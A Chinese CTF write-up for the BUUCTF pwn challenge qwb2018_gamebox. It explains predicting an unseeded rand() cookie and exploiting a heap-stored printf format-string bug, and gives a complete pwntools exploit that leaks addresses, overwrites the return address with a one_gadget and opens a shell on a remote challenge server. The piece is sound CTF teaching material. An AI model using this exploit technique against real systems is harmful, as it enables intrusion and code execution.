[BUUCTF-pwn] qwb2018_gamebox

最新推荐文章于 2023-05-25 15:38:42 发布
最新推荐文章于 2023-05-25 15:38:42 发布
阅读量453 收藏
点赞数
分类专栏: CTF pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/122500766
版权

连着几个题都不成功。

这个题有两个小漏洞,先是个冒儿,就是要猜24个随机数。但是这里直接用rand()函数没有置种子。这个可以很容易解决,就是自己运行一下,跟他输出的是一样的。

  for ( i = 0; i <= 23; ++i )
    s[i] = rand() % 26 + 65;
  puts("Come on boy!Guess what I write:");
  for ( j = 0; j <= 31; ++j )
  {
    read(0, &buf, 1uLL);
    if ( buf <= 64 || buf > 90 )
      break;
    s1[j] = buf;
  }
  if ( !strcmp(s1, s) )
  {
    puts("You great prophet!");
    sub_152C(s);
  }
  else
  {
    puts("You loooooser!");
  }

因为每次建块都要用到一行,所以先用程序生成一堆备用。

#include <stdio.h>
#include <stdlib.h>
int main(){for (int i = 0; i < 24 *80; ++i )printf("%c",rand() % 26 + 65);}

第2个漏洞点在show,每次执行会把输入的内容printf(),只不过内容不在栈里,而是在堆里。

unsigned __int64 m2show()
{
  int i; // [rsp+4h] [rbp-Ch]
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  puts("=======RANK LIST=======");
  for ( i = 0; i <= 9; ++i )
  {
    if ( *((_QWORD *)&unk_203100 + 6 * i) )
    {
      putchar(i + 48);
      putchar(58);
      printf(*((const char **)&unk_203100 + 6 * i));
    }
  }
  puts("=======================");
  return __readfsqword(0x28u) ^ v2;
}

这里没有够长的rbp链只好用指向程序本身的找针,因为这个指针比较远(偏移41处)而且指的更远,所以先处理一下指针:

先作一次printf 把内存打印出来,找到对应的有用地址偏移8:rbp指向内存地址,12:对应程序加载地址,13:libc_start_main_ret,41:指向参数./pwn

这里15->41->几百,将来通过15改41让他指向16,方便gdb,然后再让16指向13这是ret的位置,把这里改成one_gadget,刚开始用pop_rdi+1,pop_rdi,bin_sh,system发现有时成功,有时会超时。

这种题改起来比较麻烦,最好的作法是先画好图,定好指针位置,再一步步作。

from pwn import *

elf = ELF('./pwn')
context.arch = 'amd64'

def connect():
    global p,libc_elf,one,libc_start_main_ret,local
    
    local = 0
    if local == 1:
        p = process('./pwn')
        libc_elf = ELF('/home/shi/pwn/libc6_2.27-3u1/lib64/libc-2.27.so')
        one = [0x4240e, 0x42462, 0xc4f7f, 0xe31fa, 0xe31ee]
        libc_start_main_ret = 0x21a87
    else:
        p = remote('node4.buuoj.cn', 25991) 
        libc_elf = ELF('../libc6_2.27-3ubuntu1_amd64.so')
        one = [0x4f2c5,0x4f322,0xe569f,0xe5858,0xe585f,0xe5863,0x10a398,0x10a38c]
        libc_start_main_ret = 0x21b97

menu = b"(E)xit\n"
def add(cookie, size, msg):
    p.sendlineafter(menu, b'P')
    p.sendlineafter(b"Come on boy!Guess what I write:", cookie.encode())
    p.sendlineafter(b"Input your name length:", str(size).encode())
    p.sendlineafter(b"Input your name:", msg.encode())

def change(idx, cookie, msg):
    p.sendlineafter(menu, b'C')
    p.sendlineafter(b"Input index:\n", str(idx).encode())
    p.sendlineafter(b"Input Cookie:\n", cookie.encode())
    p.sendlineafter(b"input your new name(no longer than old!):\n", msg.encode())

def free(idx):
    p.sendlineafter(menu, b'D')
    p.sendlineafter(b"Input index:", str(idx).encode())
    p.sendlineafter(b"Input Cookie:", codes[cidx].encode())

def show():
    p.sendlineafter(menu, b'S')

s = "NWLRBBMQBHCDARZOWKKYHIDDQSCDXRJMOWFRXSJYBLDBEFSARCBYNECDYGGXXPKLORELLNMPAPQFWKHOPKMCOQHNWNKUEWHSQMGBBUQCLJJIVSWMDKQTBXIXMVTRRBLJPTNSNFWZQFJMAFADRRWSOFSBCNUVQHFFBSAQXWPQCACEHCHZVFRKMLNOZJKPQPXRJXKITZYXACBHHKICQCOENDTOMFGDWDWFCGPXIQVKUYTDLCGDEWHTACIOHORDTQKVWCSGSPQOQMSBOAGUWNNYQXNZLGDGWPBTRWBLNSADEUGUUMOQCDRUBETOKYXHOACHWDVMXXRDRYXLMNDQTUKWAGMLEJUUKWCIBXUBUMENMEYATDRMYDIAJXLOGHIQFMZHLVIHJOUVSUYOYPAYULYEIMUOTEHZRIICFSKPGGKBBIPZZRZUCXAMLUDFYKGRUOWZGIOOOBPPLEQLWPHAPJNADQHDCNVWDTXJBMYPPPHAUXNSPUSGDHIIXQMBFJXJCVUDJSUYIBYEBMWSIQYOYGYXYMZEVYPZVJEGEBEOCFUFTSXDIXTIGSIEEHKCHZDFLILRJQFNXZTQRSVBSPKYHSENBPPKQTPDDBUOTBBQCWIVRFXJUJJDDNTGEIQVDGAIJVWCYAUBWEWPJVYGEHLJXEPBPIWUQZDZUBDUBZVAFSPQPQWUZIFWOVYDDWYVVBURCZMGYJGFDXVTNUNNESLSPLWUIUPFXLZBKNHKWPPANLTCFIRJCDDSOZOYVEGURFWCSFMOXEQMRJOWRGHWLKOBMEAHKGCCNAEHHSVEYMQPXHLRNUNYFDZRHBASJEUYGAFOUBUTPNIMUWFJQSJXVKQDORXXVRWCTDSNEOGVBPKXLPGDIRBFCRIQIFPGYNKRREFXSNVUCFTPWCTGTWMXNUPYCFGCUQUNUBLMOIITNCKLEFSZBEXRAMPETVHQNDDJEQVUYGPNKAZQFRPJVOAXDPCWMJOBMSKSKFOJNEWXGXNNOFWLTWJWNNVBWJCKDMEOUUZHYVHGVWUJBQXXPITCVOGRAIDDVHRRDSYCQHKLEEWHXTEMBAQWQWPQHSUEBNVFGVJWDVJJAFQZZXLCXDZNCQGJLAPOPKVXFGVICETCMKBLJOPGTQVVHBGSDVIVHESNKQXMWRQIDRVMHLUBBRYKTHEYENTMROBDEYQCRGLUAIIHVEIXWJJRQOPUBJGUXHXDIPFZWSWYBGFYLQVJZHARVRLYAUUZDRCNJKPHCLFFRKEECBPDIPUFHIDJCXJHRNXCXMJCXOHQANXDRMGZEBHNLMWPMHWDVTHSFQUEEEXGRUJIGSKMVRZGFWVRFTWAPDTUTPBZTYGNSRXAJJNGCOMIKJZSDWSSZNOVDRUYPCNJULKFUZMXNAFAMESPCKJCAZXDRTDGYRQSCCZYBNVQQCQCJITLVCNVBMASIDZGWRAATZZWPWMFBFJKNCVKELHHZJCHPDNLUNMPPNLGJZNKEWWUYSGEFONEXPMMSBAOPMDGZQMKQZXUVTQVNXBSLQZKGLZAMZPDNSJOLVYBWXXTTQOGNRBAIAKQLLSZKHFZCONNMOQKLPEEFSNSMOUWQHODSGCFOHESYSHMGXWTOAYUVNOJDJFTQTWKBAPRIUJIMQWSPSLGVLCSAQBDBGWTBSEETTWDNFNBYJVPDJXYUZQXSTATBZPCTTHOOFREMGFKRBCVKZVGBOFTHGOJHDNAYWPNBITORAAIBEDNEZWFPDAWLOHSSVTQTKFVSYLJZLUCQXSWYQDNTDMFRTZLQSEKEJHZKSKLFEPXCHVCZYSVDGCXBBISWMEAYLZIFKTMOIKSSFXTGPOJXQIYSRSQFWQDJQNQCGDQRNLLUIEAZVMWNUUFNNXVLOYVGMLIUQANDLYAVFAUAOSNLNVACSVPIUMOIAWCQXSWKQWGXYAZ"
codes = [s[i*24:i*24+24] for i in range(len(s)//24)]

cidx = -1
def getcodes():
    global cidx,old_cookie
    cidx +=1
    return codes[cidx]

'''
0056| 0x7ffff5e06bf0 --> 0x7ffff5e06c10 --> 0x55f82be8f940 (push   r15)                       #8
0064| 0x7ffff5e06bf8 --> 0x55f82be8f8af (movzx  eax,BYTE PTR [rbp-0x9])                       
0072| 0x7ffff5e06c00 --> 0x58007ffff5e06cf0 
0080| 0x7ffff5e06c08 --> 0x5cb703295bf72300 
0088| 0x7ffff5e06c10 --> 0x55f82be8f940 (push   r15)                                          #12
0096| 0x7ffff5e06c18 --> 0x7faa45465a87 (<__libc_start_main+231>:    mov    edi,eax)           #13
0104| 0x7ffff5e06c20 --> 0x0 
0112| 0x7ffff5e06c28 --> 0x7ffff5e06cf8 --> 0x7ffff5e0841c --> 0x4853006e77702f2e ('./pwn')   #15->41->./pwn
'''

def pwn():
    
    add(getcodes(), 30, '%8$p,%12$p,%13$p,%41$p,'.ljust(30,'Z')) #rbp,pwn+1940,libc+main_ret, ->./pwn
    show()
    p.recvuntil(b'0:')
    rbp = int(p.recvuntil(b',', drop=True), 16)
    pwn_base = int(p.recvuntil(b',', drop=True), 16) -0x1940
    libc_base = int(p.recvuntil(b',', drop=True), 16) - libc_start_main_ret
    arg0 = int(p.recvuntil(b',', drop=True), 16)
    print(f'rbp:{hex(rbp)},pwn:{hex(pwn_base)},libc:{hex(libc_base)}')
    
    libc_elf.address = libc_base
    free_hook = libc_elf.sym['__free_hook']
    system    = libc_elf.sym['system']
    pop_rdi   = next(libc_elf.search(asm('pop rdi;ret')))
    bin_sh    = next(libc_elf.search(b'/bin/sh'))
    one_gadget= libc_base + one[0]
    elf.address = pwn_base    
    free(0)
    
    #15->41->X ==> 15->41->16 
    offset = 16
    rbp_16 = rbp+0x20
    print(f'offset:{offset}')
    payload = f"%{(rbp_16) & 0xFFFF}c%15$hn"
    add(getcodes(), 30, payload)
    show()
    free(0)

    #15->41->16:_libc_start_main_ret
    p_ret = p64(rbp_16 - 0x18)
    for i in range(7,-1,-1):
        v = p_ret[i] #+ p_got_free[i+1]*0x100
        #15->41
        if ((rbp_16 +i)&0xff) == 0:
            payload = "%15$hhn"
        else:
            payload = f"%{(rbp_16+i)&0xff}c%15$hhn"
        add(getcodes(),30, payload)
        show()
        free(0)
        #41->X
        if v == 0:
            payload = "%41$hhn.x.x."
        else:
            payload = f"%{v}c%41$hhn.x.x."
        add(getcodes(),30, payload)
        show()
        free(0)

    #41->16->13:pop_rdi,bin_sh,system
    p_system = flat(one_gadget)
    for i,v in enumerate(p_system):
        #41++
        if ((rbp_16-0x18+i)&0xff) == 0:
            payload = "%41$hhn"
        else:
            payload = f"%{(rbp_16 -0x18 +i)&0xff}c%41$hhn"
        add(getcodes(),30, payload)
        show()
        free(0)

        #16->ret+
        if v == 0:
            payload = f"%16$hhn.x.x."
        else:
            payload = f"%{v}c%16$hhn.x.x."
        add(getcodes(),30, payload)
        show()
        free(0)

    #gdb.attach(p)
    #pause()
    p.sendlineafter(menu, b'E')
    context.log_level = 'debug'        
    p.sendline(b'cat /flag')    
    p.interactive()

connect()
pwn()

石氏是时试
关注
专栏目录
南邮ctf pwn1--沙窝里的王
weixin_43600412的博客
07-27 534
在虚拟机中打开终端输入file 指令,查看其是32位还是64位: 很明显,这是32位。再输入checksec命令查看其保护机制: 可以看到stack中canary found保护开启,此保护的原理机制如图 在栈底ebp上面的栈空间里面,每执行一次函数,这个机制会放入一个数,并且另外单独存放这个数,这个数是随机生成的,并且每一次都不一样,如果这个栈被木马覆盖掉,那么这个数也会被覆盖,程序执行时发现...
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 992
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
【强网杯2018】Gamebox
weixin_30733003的博客
12-21 603
参考: https://www.cnblogs.com/hac425/p/9416787.html http://tacxingxing.com/2018/03/28/2018qwb/ 事后复盘pwn,对于Gamebox一题发现网上wp都是大佬们利用堆玩出花,本菜鸡看到有printf格式化字符串漏洞,而且也没有防护,就想试试。但是难点在于printf(s)的s在堆上 由...
pwn-随机计算题类型
IT_huanhuan的博客
05-25 1319
沙盒机制也就是我们常说的沙箱,英文名sandbox,是计算机领域的虚拟技术,常见于安全方向。一般说来,我们会将不受信任的软件放在沙箱中运行,一旦该软件有恶意行为,则禁止该程序的进一步运行,不会对真实系统造成任何危害。在ctf比赛中,pwn题中的沙盒一般都会限制execve的系统调用,这样一来one_gadget和system调用都不好使,**只能采取open/read/write的组合方式来读取flag。
CTF总结-PWN
qq_42747131的博客
05-14 7046
一、通用过程 通过file指令查看二进制文件是32位还是64位,这个影响特别大(涉及参数的传递方式) 通过checksec指令查看可执行文件的保护措施开启情况 运行一下这个可执行文件,了解一些程序运行流程 开始通过pwntools解题 pwntools 二、缓冲区溢出攻击 寻找可以进行攻击的位置 通过cyclic [number] 获得一个长度为number的序列 在攻击处输入上一步获得的序列,查看报错信息 通过cyclic -l [序列] 来判断从第几位开始覆盖的是返回地址 构造payload 构造
[BUUCTF-pwn] wdb_2018_final_pwn3
weixin_52640415的博客
12-16 381
一个栈溢出的题,没开PIE 程序先打开随机数发生器,读入然后加密,与输入的对比,不同时可输入0x400数据(溢出)相同则跳出循环。 fd = open("/dev/urandom", 0); while ( 1 ) { puts("\nFind a MD5 hash collision!"); printf("target: "); read(fd, buf, 0x3FFuLL); crypto(buf, 0x64uLL, (__int64)s2);
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
[BUUCTF]PWN-wdb_2018_3rd_soEasy
红凳子的博客
05-07 445
[BUUCTF]PWN-wdb_2018_3rd_soEasy前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd impo
BUUCTF - PWN】ciscn_2019_c_1
古月浪子的博客
03-20 4084
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
CTF中的PWN——srand()/rand()漏洞(栈溢出)
壊壊的诱惑你的博客
11-16 4782
摘要: 本以为自己栈溢出学的不错了,挑战了一下攻防世界的PWN高手进阶,发现栈溢出还是有很多相关的漏洞,今天总结一下srand()函数的漏洞。 srand()/rand(): 简单介绍一下这两个函数: rand()函数是使用线性同余法做的,它并不是真的随机数,因为其周期特别长,所以在一定范围内可以看成随机的。 srand()为初始化随机数发生器,用于设置rand...
BUUCTF笔记之Misc系列部分WriteUp(二)
克格莫(有需要的私信)
06-18 3683
1.爱因斯坦 binwalk分离出一个压缩包。 查看图片备注: 解压得到flag。
Buuctf pwn1 详细wp
anxiong1803的博客
09-19 2593
目录 程序基本信息 程序溢出点 确定返回地址 编写exp脚本 成功getshell 程序基本信息 我们可以看到这是一个64程序,没有保护开启。 程序溢出点 gets函数可以读取无限字符,存在栈溢出。 接下来我们测测需要多少字符长度可以溢出...
buuctf中的一些pwn题总结(不断更新)
PLpa的博客
08-19 4573
前言: 本文记录一些buuctf中不是很典型,但是仍然值得记录的pwn题,以便于查看。 0x00:stkof——unlink 查看保护 查看IDA伪代码 增 自定义size,使用malloc分配。 删 free之后直接置空,难以利用。 改 重点来到改中,这里可以随意输入大小,然后根据输入的大小来为堆块中填入数据。这样就造成了堆溢出漏洞。 解题思路 由于此题存在堆溢出漏洞,我们又掌控着heap地址的存在位置,这样我们很容易就想到unlink漏洞来控制堆块。 由于程序本身的原因,我们先malloc一个堆
知乎小白关于ctf竞赛训练 积累的资料
syh_486_007的专栏
09-04 3万+
一个巧合的机会,成为了CTF夺旗爱好者,一个ctf小白。从12年开始国内大大小小的CTF比赛我都看过,那会还没有统一叫CTF,都是叫 网络攻防赛、信息安全赛之类的,目的就是为了通过技术手段找到最终的key(现在的CTF中叫做flag)。只是到了后来慢慢的可能受到DEFCON CTF的影响国内所有的安全竞赛也统一叫做CTF竞赛了。 国内外比较知名的比赛:XCTF联赛、DEFCON CTF、首都网络
*ctf box题解
Cosmopolitan的博客
04-17 1183
题目给了源码 /* * main.c * Copyright (C) 2019 hzshang <hzshang15@gmail.com> * * Distributed under terms of the MIT license. */ #include <stdio.h> #include <stdlib.h> #include <str...
CTF比赛中必备的瑞士军刀ctf-tools
Terminal Cloud
06-26 1万+
ctf-tools CTF:全称Capture The Flag,即夺旗比赛,衍生自古代军事战争模式,两队人马前往对方基地夺旗,每队人马须在保护好己方旗帜的情况下将对方旗帜带回基地。ctf-tools 集合了很多黑客ctf大赛中需要使用的工具。 下载地址 官方主页 ctf-tools是一个集合了各种安全研究工具的管理脚本,使得大家能够一键轻松的安装并使用
CTF writeup 0_IDF实验室
Troy
10-25 9704
牛刀小试1.被改错的密码从前有一个熊孩子入侵了一个网站的数据库,找到了管理员密码,手一抖在数据库中修改了一下,现在的密码变成了 cca9cc444e64c8116a30la00559c042b4,那个熊孩子其实就是我!肿么办求解!在线等,挺急的。。 PS:答案格式wctf{管理员原密码}刚开始猜是Base46或者MD5,二话不说解码走起,结果都是乱码…(囧rz).仔细看了一下,描述中有”手一抖在数
2021-07-04 CTF夺旗赛 CTF 黑客大赛导引
热门推荐
时光隧道
07-04 5万+
CTF 黑客大赛导引 目的 介绍CTF比赛 CTF比赛需要的知识储备 CTF比赛的神器 CTF比赛的作用 CTF比赛的经验 一:CTF比赛 “夺旗大赛” 比赛形式 1.挖掘漏洞,利用漏洞进入对方电脑,拿到关键文件 /home/www/flag /home/ctf/flag 比赛历史与背景 种类 cft xcft--->强网杯 tcft defcon ctf 2.形式 1.ctf线上赛 web 二进制 杂项 2.ctf线下赛 web漏洞挖掘与利用---10% pwn漏洞与利用----90
mqtt-pwn安装
最新发布
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装pwntools:使用命令`python3 -m pip install --upgrade pwntools`来安装并更新pwntools。 2. 安装mosquitto程序和mosquitto-clients客户端程序:使用命令`sudo apt install mosquitto`和`sudo apt install mosquitto-clients`来安装mosquitto程序和mosquitto-clients客户端程序。 请注意,以上步骤假设您已经在Linux环境下进行操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值